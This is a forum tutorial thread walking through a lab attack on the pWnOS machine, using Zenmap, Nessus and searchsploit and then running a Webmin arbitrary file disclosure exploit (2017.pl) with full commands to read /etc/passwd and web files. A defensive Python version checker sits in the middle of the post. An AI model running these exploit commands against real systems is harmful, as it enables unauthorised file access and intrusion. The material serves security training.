
TUTORIAL - Privilege Escalation; Part I

Discussion in 'Privilege Escalation' started by Witranx, Apr 1, 2013.

  1. Witranx (Staff Member)
    1. Information Gathering Step

    A. Using Zenmap

    Our target IP is 192.168.0.21
    We now know the running services: ssh, http, and netbios.
    B. Open our target via web browser
    Because the http service is running, we will try to open it via browser.
    We can try to follow how the web site works.
    Then try to change the GET parameter. In this case we change the "true" parameter in the address bar, and the error message appears.
    From the error message, we know that the file of this web site is placed in /var/www/ and the name of this file is index1.php.
    2. Service Enumeration Step
    From Zenmap we know the running services and the ports they use. We can get in-depth info about the services by using Nessus.
    Fill in the IP address of the target and choose the Internal Network Scan for an intranet target.
    We now know the running services and their vulnerability level. For details we can click the service.
    3. Vulnerability Assessment
    From the details we can analyze the vulnerability of the service. After that, we can choose and try to exploit it. In this case we choose port 10000 / http for exploiting.
    From the details we know that the webmin version used is before 1.296 and usermin is below 1.226.
    4. Exploit using exploitdb
    Open it via K-menu - Apps - Exploitation Tool - Open Source Exploitation - Exploitdb - exploitdb directory.
    Then search for the exploitation script in the database by typing ./searchsploit webmin. We can use the following script for the exploitation.
    root@bt:/pentest/exploits/exploitdb# ./searchsploit webmin
    Description Path
    --------------------------------------------------------------------------- -------------------------
    Webmin BruteForce and Command Execution Exploit /multiple/remote/705.pl
    Webmin Web Brute Force v1.5 (cgi-version) /multiple/remote/745.cgi
    Webmin BruteForce + Command Execution v1.5 /multiple/remote/746.pl
    Webmin < 1.290 / Usermin < 1.220 Arbitrary File Disclosure Exploit /multiple/remote/1997.php
    Webmin < 1.290 / Usermin < 1.220 Arbitrary File Disclosure Exploit (perl) /multiple/remote/2017.pl
    phpMyWebmin 1.0 (window.php) Remote File Include Vulnerability /php/webapps/2451.txt
    phpMyWebmin 1.0 (window.php) Remote File Include Vulnerability /php/webapps/2451.txt
    phpMyWebmin <= 1.0 (target) Remote File Include Vulnerabilities /php/webapps/2462.txt
    phpMyWebmin <= 1.0 (target) Remote File Include Vulnerabilities /php/webapps/2462.txt
    phpMyWebmin <= 1.0 (target) Remote File Include Vulnerabilities /php/webapps/2462.txt
    Because our target vulnerability is in the webmin application and the version is below 1.296, we can try the following scripts:
    Webmin < 1.290 / Usermin < 1.220 Arbitrary File Disclosure Exploit /multiple/remote/1997.php
    Webmin < 1.290 / Usermin < 1.220 Arbitrary File Disclosure Exploit (perl) /multiple/remote/2017.pl
    In this case we try to use Webmin < 1.290 / Usermin < 1.220 Arbitrary File Disclosure Exploit (perl) /multiple/remote/2017.pl to get username in our Linux application target.
    To use this script we can type perl 2017.pl

    root@bt:/pentest/exploits/exploitdb/platforms/multiple/remote# perl 2017.pl
    Usage: 2017.pl <url> <port> <filename> <target>
    TARGETS are
    0 - > HTTP
    1 - > HTTPS
    Define full path with file name
    Example: ./webmin.pl blah.com 10000 /etc/passwd
    We now know how to use it: type perl 2017.pl <url> <port> <filename> <target>
    Based on our target we can type perl 2017.pl 192.168.0.21 10000 /etc/passwd 0. Our target IP is 192.168.0.21 and the target port is 10000.
    With this script we can view the target's files on our computer.
    Now we can try to view the web application files in /var/www/
    root@bt:/pentest/exploits/exploitdb/platforms/multiple/remote# perl 2017.pl 192.168.0.21 10000 /var/www/ 0
    WEBMIN EXPLOIT !!!!! coded by UmZ!
    Comments and Suggestions are welcome at umz32.dll [at] gmail.com
    Vulnerability disclose at securitydot.net
    I am just coding it in perl 'cuz I hate PHP!
    Attacking 192.168.0.21 on port 10000!
    FILENAME: /var/www/
    FILE CONTENT STARTED
    -----------------------------------
    <HTML>
    <body>
    <center><h1>Welcome to the pWnOS homepage!
    </h1></center>
    <p>This is the help page. If you would like help, click the next button below.</p>
    <p>
    <button style="width:65;height:65" onClick="window.location='index1.php?help=true&connect=true'"><b>Next</b></button>
    </p>
    -------------------------------------
    root@bt:/pentest/exploits/exploitdb/platforms/multiple/remote# perl 2017.pl 192.168.0.21 10000 /var/www/index2.php 0
    WEBMIN EXPLOIT !!!!! coded by UmZ!
    Comments and Suggestions are welcome at umz32.dll [at] gmail.com
    Vulnerability disclose at securitydot.net
    I am just coding it in perl 'cuz I hate PHP!
    Attacking 192.168.0.21 on port 10000!
    FILENAME: /var/www/index2.php
    ....Continued in Part II
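The vulnerability-assessment step in the post above (section 3) boils down to comparing the Webmin/Usermin version found during enumeration against the thresholds the post quotes (webmin before 1.296, usermin below 1.226). The following script is an added example and is not part of the original post; it shows how a defender can run that check over a list of enumeration findings so affected hosts get patched before anyone reaches section 4. The names FIXED_VERSION, parse_version, is_affected, assess and SAMPLE_FINDINGS are my own, and the findings table is constructed sample data (only 192.168.0.21 comes from the post; the other hosts and banners are made up).

```python
from decimal import Decimal, InvalidOperation
import re

# Thresholds quoted in the tutorial above: Webmin before 1.296 and
# Usermin below 1.226 are treated as affected. Constructed table;
# adjust it to the advisory you are actually checking against.
FIXED_VERSION = {
    "webmin": Decimal("1.296"),
    "usermin": Decimal("1.226"),
}

# Matches banners such as "MiniServ/1.280" (the HTTP Server header that
# Webmin and Usermin send) or a plain "webmin 1.280" from a scanner summary.
BANNER_RE = re.compile(r"(?i)\b(webmin|usermin|miniserv)[/ ]+(\d+(?:\.\d+)?)")


def parse_version(text):
    """Return the version from a banner as a Decimal, or None if not found."""
    m = BANNER_RE.search(text)
    if not m:
        return None
    try:
        return Decimal(m.group(2))
    except InvalidOperation:
        return None


def is_affected(product, version):
    """True when the version is below the fixed release for that product.

    Webmin/Usermin versions are plain decimal numbers (1.290 < 1.296 < 1.300),
    so Decimal comparison is the right tool; a tuple-of-ints comparison would
    mis-order e.g. 1.30 and 1.296.
    """
    fixed = FIXED_VERSION.get(product.lower())
    if fixed is None:
        return False          # product not in our table: nothing to say
    return Decimal(str(version)) < fixed


def assess(findings):
    """findings: list of (host, port, product, banner) from enumeration.

    Returns a list of (host, port, product, version) tuples flagged as
    affected. Findings whose banner carries no parsable version are skipped.
    """
    flagged = []
    for host, port, product, banner in findings:
        ver = parse_version(banner)
        if ver is None:
            continue
        if is_affected(product, ver):
            flagged.append((host, port, product, str(ver)))
    return flagged


# Constructed sample findings in the shape a scan summary would give.
SAMPLE_FINDINGS = [
    ("192.168.0.21", 10000, "webmin", "Server: MiniServ/1.280"),
    ("192.168.0.21", 20000, "usermin", "Server: MiniServ/1.230"),
    ("192.168.0.22", 10000, "webmin", "Server: MiniServ/1.300"),
    ("192.168.0.23", 22, "ssh", "SSH-2.0-OpenSSH_4.3"),
]

if __name__ == "__main__":
    for row in assess(SAMPLE_FINDINGS):
        print("AFFECTED %s:%d %s %s" % row)
```

Run against the constructed findings, only the Webmin instance on 192.168.0.21 (1.280) is flagged; the Usermin 1.230 and Webmin 1.300 entries are at or above their thresholds and the SSH banner has no Webmin version to parse. The product name comes from the finding rather than the banner because both Webmin and Usermin identify themselves as MiniServ.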
  2. global93 (New Member)
    up top